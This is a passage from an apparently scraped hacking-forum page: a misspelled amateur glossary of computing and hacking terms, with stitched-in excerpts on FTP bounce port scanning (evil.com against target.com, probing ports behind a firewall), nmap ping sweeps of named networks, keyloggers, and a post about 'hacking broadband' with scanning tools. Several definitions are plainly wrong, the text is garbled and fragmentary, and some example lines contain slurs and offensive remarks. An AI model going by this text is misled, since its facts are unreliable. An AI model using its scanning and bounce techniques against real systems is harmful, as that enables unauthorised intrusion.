haven't seen any others that do this). >FTP(file transfere protocol)is a serivice which runs on port 21 an allows users with valid accounts to login and upload files and download files. >FTP BOUCE ATTACK: An interesting "feature" of the ftp protocol (RFC 959) is support for "proxy" ftp connections. In other words, I should be able to connect from evil.com to the FTP server-PI (protocol interpreter) of target.com to establish the control communication connection. Then I should be able to request that the server-PI initiate an active server-DTP (data transfer process) to send a file ANYWHERE on the internet! Presumably to a User-DTP, although the RFC specifically states that asking one server to send a file to another is OK. Now this may have worked well in 1985 when the RFC was just written. But nowadays, we can't have people hijacking ftp servers and requesting that data be spit out to arbitrary points on the internet. As *Hobbit* wrote back in 1995, this protocol flaw "can be used to post virtually untraceable mail and news, hammer on servers at various sites, fill up disks, try to hop firewalls, and generally be annoying and hard to track down at the same time." What we will exploit this for is to (surprise, surprise) scan TCP ports from a "proxy" ftp server. Thus you could connect to an ftp server behind a firewall, and then scan ports that are more likely to be blocked (139 is a good one). If the ftp server allows reading from and writing to a directory (such as /incoming), >FUNCTION:is a subprogram or small program which does a certain task then returns the answer to the main program. >GANG MESSAGES:spam messages posted to usenet or emailed to users. >GATEWAY:the link that translates two different types of computer networks,a router which connects a lan to a larger network. >GEEK:is a person who knows more about computers than he does know on his self,geeks are usally anti social and ugly ppl. >GREP:referred to as search or scan. >GNONME:is a linux desktop environment built by hacker and is similar to kde. >GOPHER:a system used for finding info on the net,named after the university of minesota's golden gophers. >GOTO:is a common programming code e.g. code written in qb. print "wassup" input "well!" name$ if name$ = kev then GOTO celtic ........ .............. .. end >GROUP:A collection of computer user identifiers used as a convenience in assigning resource access rights or operational privileges. >GSN:Acronym for Gigabyte System Network. >GUI:Acronym for Graphical User Interface. >GURU:is a knowledgeble computer dude usally earn mega cash and studies network security and hacking!. >HACK:a hack is a sucessfull piece of code which has been changed or it can be when a hacker sucessfully hacks a system througn an exploit or using BF, e.t.c >HACKER:are the dudes who make the internet what it is,most of the hackers program and contrinute to the linux world and most of them like to study network security and breaking into systems. >HANG UP:used by war dialers once a dial toned is found. >HAYES COMMAND SET:a set of instruction for controling basic functions like dial modems then hanging up. >HIDDEN FILES:all o/s have hidden files by default to stop newbies messing them up,although when u hack a system it is hard to find hidden file but the unix command "ls -vat /dir" finds hidden files. >HEXADECIMAL:a number that uses base 16 to base 10. >HEXEDITOR:is a program used for viewing the computer binary code of a program. 105.HIGH LEVEL LANGUAGE:is a program language which can almost be written in english High Level Languages are closer to Human Languages, and because of this, they are easier understood, easier written, easier maintained and adjusted. The problem with High-Level Programming Languages is that they lack slightly in speed compared to the lower languages, the reason for this is that the Compiler has to convert the High-Level code into Machine Language before the computer reads it and follows the instructions. The first of these languages started to emerge around the 1950's and there are now tons of them around like Pascal, C and C++. >HOME:is the default directory u get as soon as u login to unix.usally /root or /home/user >HOST:is a computer which stores files and is referred to each hackers target !the host computer! >HOST ID:the portion of an ip that identifies a particular computer within a network. >HOST TABLE:the host or lmhost file that contains a list of knownip addresses mapped to host names or netbios computer >HOTMAIL:is a free email site which has the largest number of users than anywhere in the world,usally because is has so much users and the owners "Mcft" make it hard to hack beacuse micosoft invests a lot of cash in it the security of bug tracking!. >HTML(hyper text markup language):is a the most used scripting language for programming web pages as it is easy to use.e.g adolf hitler was a very naughty man! telnet me >HTTP:is run on port 80 and is known as www,http is known as hyper text transfer protocol. >HYPERTERMINAL:is a windows communication program used for contacting bbs's and it can be used as a telnet client as well. >HUB:a device on a network where it connects all the pc's togthers using their wires and connecting them to the hub. >IBM:internation business machine:is a computer firm which lead in the making of computers,ibm also have one of the strongest security networks in the world. >ICE:(Intrusion Countermeasure)Term reffering to the security programs in Gibson's cyberspace (also called BLACKICE). >IDENITY HACKING:The use of pseudo-anonymity or false accounts to put oneself off as another person on the Internet. >IDLE:when a computer isnt doing nothing,usally thats the best time to start hacking! >ILLS:is a more than a webserver is helps u create websites configure ftp and stmp ,e.t.c ICMP echo scanning :This isn't really port scanning, since ICMP doesn't have a port abstraction. But it is sometimes useful to determine what hosts in a network are up by pinging them all. the -P option does this. ICMP scanning is now in parallel, so it can be quite fast. To speed things up even more, you can increase the number of pings in parallel with the '-L ' option. It can also be helpful to tweek the ping timeout value with '-T '. nmap supports a host/bitmask notation to make this sort of thing easier. For example 'nmap -P cert.org/24 152.148.0.0/16' would scan CERT's class C network and whatever class B entity 152.148.* represents. Host/26 is useful for 6-bit subnets within an organization. Nmap now also offers a more powerful form. You can now do things like '150.12,17,71-79.7.*' and it will do what you expect >IETF(internet enginerring task force):a consortuim that introduces new tchnologly on the ineterne,they rite rfc's. >IF:is a progaramming statment which is often used with IF and THEN e.g. code if X = 5 then print "i am a faggot!" >IGMP(internet group manahement protocol):a tcp/ip protocol used in conjuction with multcasting in a class d network. >INDEPENDENT LOGICAL UNIT:An LU that does not depend on an SSCP in an SNA host system for session initiation and can send both a BIND request and a BIND response. Only LU Type 6.2 LUs can function as independent LUs >INHERITANCE:is used in object orented programming languages,when one object copies the feauture from another object. >INODE:A persistent data structure in a UNIX or UNIX-like file system that describes the location of some or all of the disk blocks allocated to the file. INTERNET EXPLORER(IE):is a web browser owned by Mcft and it distributes as a free were product to anyone who want to download it.IE is the msot used in the market at 75 per cent domination form rival browsers like netscape. >INTERNET SERVER APPLICATION PROGRAMMING INTERFACE(ISAPI): A programming interface that allows a Mcft Internet Server to execute server-based application programs. >INTERNIC:is the place of internet information center were ppl are more or less in charge of the net,they also assign ip address to isp's and websites,internic can be used to track down ip addreses using their "whois query". >INITIAL SEQUENCE NUMBER(isn):a number that marks the beginnging of the range of numbers a computer will use for sequence bytes transmiited through TCP. >INTRANET:is a small vesrion of the internet except it isnt public and is only on LAN'S >INTRUDER:is when a hacker or unathorised user breaks into a part of the system which is forbidden for user access. >I/O OPERATOR:A read, write, or control function performed to, from or within a computer system. For example I/O operations are requested by control software in order to satisfy application I/O requests made to virtual disks. cf. I/O request >IP(Internet protocol):the method for viewing web information and is used for sending packets computers. >.IP ADDRESS:is a 32 bit number giving to every user on the net by their isp,ip addreses can be used to track down users or used by hackers to connect to a system. e.g. an ip address looks like 157.22.111.111,if u still dont understand what an ip address is its basically a number which identifies internet users just like street addreses identify people houses.. >IP SPOOFING:Is when a user fakes his ip address to look like the trusted hosts or makes it look like somebody elses ip address. >IP ROUTING:The process of of recieving an ip packet addreses to somewhere else on one network and sending it on its way from another network. >IPCONFIG:is used in windows 2000 to show a user his ip address,dns server ,e.t.c >IPX/SPX(internetwork packet exchange /seqence packet exchanege)Surprisedn novell network systems,IPX is a network layer protocol used in file server o/s. [color=cyan]>IPX TUNNELING:a method of supporting IPX/SPX on TCP/IP networks by interfacing IPX with TCP/IP's transport layer >IRC:internet relay chat is a place were users can chat and the ppl are usally more ettiquate ,irc clients include pitch,mirc,xchat,irc servers are usally on port 6667. >IRIX:is an o/s similar to unix and mostly used by banks e.t.c >ISDN(intergrated service digital network)is a very fast digital telecommuncation connection with speeds around 128kps. >ISP(internet service provider):is the company which gives u access to the internet and services like usenet,web browsing,telnet.ISP also issue each user an static or dymanic ip address. >JAVA:a programming language devoloped by suns microsystems,java scripts main advantage is it can run on any o/s connected to the internet. >JOHN THE RIPPER:is password cracker used to crack /etc/passwd on unix. >KDE:A POWERfull linux gui which looks like windows but has more power. >.KERNEL:is a hacking term used to describe the core of an o/s or program. 124.KILL:is a c and unix command> >KPPR - (Key Press Password Recorder):A tiny hacking program that is laoded into a computer and then records every key that is pressed. Used to find out login usernames, and passwords (also called Trojan hoarse, Stealth Password Recorder, Key/Keypress Capturer, Password Recorder, Password Sniffer, Password Snooper and Login Spoof). >LAN:is a group of computers connected together through wires or phone lines to share information,LAN are the most common type of network as they are inexensive and easilly configured. >LAN EMULATION:A collection of protocols and services that combine to create an emulated local area network using ATM as the underlying network. Abbreviated LANE. Local area network emulation enab >LDAP(Lightweight Directory Access Protocol.): An IETF protocol for creating, accessing and removing objects and data from a directory. It provides the ability to search, compare, add, delete and modify directory objects, as well as modifying the names of these objects. It also supports bind, unbind and abandon (cancel) operations for a session. LDAP got its name from its goal of being a simpler form of DAP (Directory Access Protocol), from the X.500 set of standards. LINK CONTROL PROTOCOL(LCP):a protocol used by ppp to establish ,manage and terminate dial up networking. >LINUX:is a sharewere type version of unix with about 96 per cent of the same feautures,linux as widely used by programmers and hackers because of its security features and of its open source.Hackers usally use linux because it supports all the major programming languages and because it has more power in networking than its rival o/s windows. >LOCAL:is a computer which is in the same building as the other computers on a network,local hackers are hackers within the same network,remote hackers are hackers who hack in from a remote location such as from the other side of the country. >LOCAL TALK:the connecters and cables which make up the apple talk network. >LoD (Legion of Doom):Legendary hacker group of the 90's. >.LOG:is a file which records every ip address which connects to a system and can record the presence of hackers in a system,logs are usally write protected and are the main cause of newbie hackers getting traced. >LOG IN:to gain access to a computer by giving the correct id and password. >LOG OFF:to log out of a computer system once your loged in. >LOGICAL ADDRESS:a network address coniguration though the protocol softwere. >LOGICAL LINK CONTROL SUBLAYER:a sublayer of OSI's datalayer that is resonsible for error checking and managing links between sevices on a subnet. >LOGO:is a programming language designed to show children how to work a pc. >LOOPBACK ADDRESS:127.0.0.1 is refered to every o/s as its own machine,for e.g every computers ip address is always 127.0.0.1. >LOVE BUG:was a worm written by eyespider in visual basic,the lovebug exploited a loop hole in outlook express and then emailed it;s self to every user in the users address book. >LURKER:is someone who read messgages on usenet but doent contribute,almost 90% of users are luckers. >MCAFFE:is one of the world leaders in anti virill programs. >MACHINE LANGUAGE:is the code which the computer understans which is in binary,Aside from computers that utilize programmable micro code (which, by the way we're not covering) 'Machine Language' the lowest level of programming languages These are the only kind of language that computers recognise, although they are almost impossible to read to programmers, mainly because they consist of just numbers. When you write a program in a high level language such as Pascal, the compiler will convert your instructions into this so that the computer understands. And for information's sake, 'Machine Language' is converted to 'High-Level language' by an 'assembler'. Every CPU has its own unique machine language. Programs must be rewritten or recompiled, therefore, to run on different types of computers. >MACHINITOSH:is a make of o/s which started back in the 70;s and is owned by apple corp. >.MACRO:is a program written to record certain tasks and repeat them,macro's are mainly used in MS OFFICE applications and are written in visual basic. >MAIL BOMB.is a from of a DoS attack used by script kiddies to send ppl thousands of emails and block legitement ones. [color=cyan]>MANDRAKE LINUX:is a linux distro based on redhat linux,with the same feutures,renound for its newbie freindlyness. >.MAP:is to add a tempory drive to your pc,so that u can access another computers hard drive on a network. >MULTICAST:Allows datagrams to be delivered to a group of hosts simultaneusly. >MBIT(MAGEA BIT): >MBps:Acronym for megabytes per second. A measure of bandwidth or data transfer rate. >MAC(MEDIA ACCESS CONTROL): Algorithms that control access to physiCal media, especially in shared media networkshis is a network setup…; Added by Rajiv E-H 89 at 6:35pm on December 12, 2007

Page: Shafihot's Tricks Hacking Cracking VirusWriting: A simple Process to hack Broadband check it REQUIRED For hacking BroadBand you will require *Angry ip scanner * Asterix Key 7.11 * A Computer *An internet connection Download AngryIPScan and Asterix k; Added by shafihot at 11:05pm on November 25, 2007

Welcome to
Hacking software, Free Hacking Tools, Hackers, Hacking program

Sign Up
or Sign In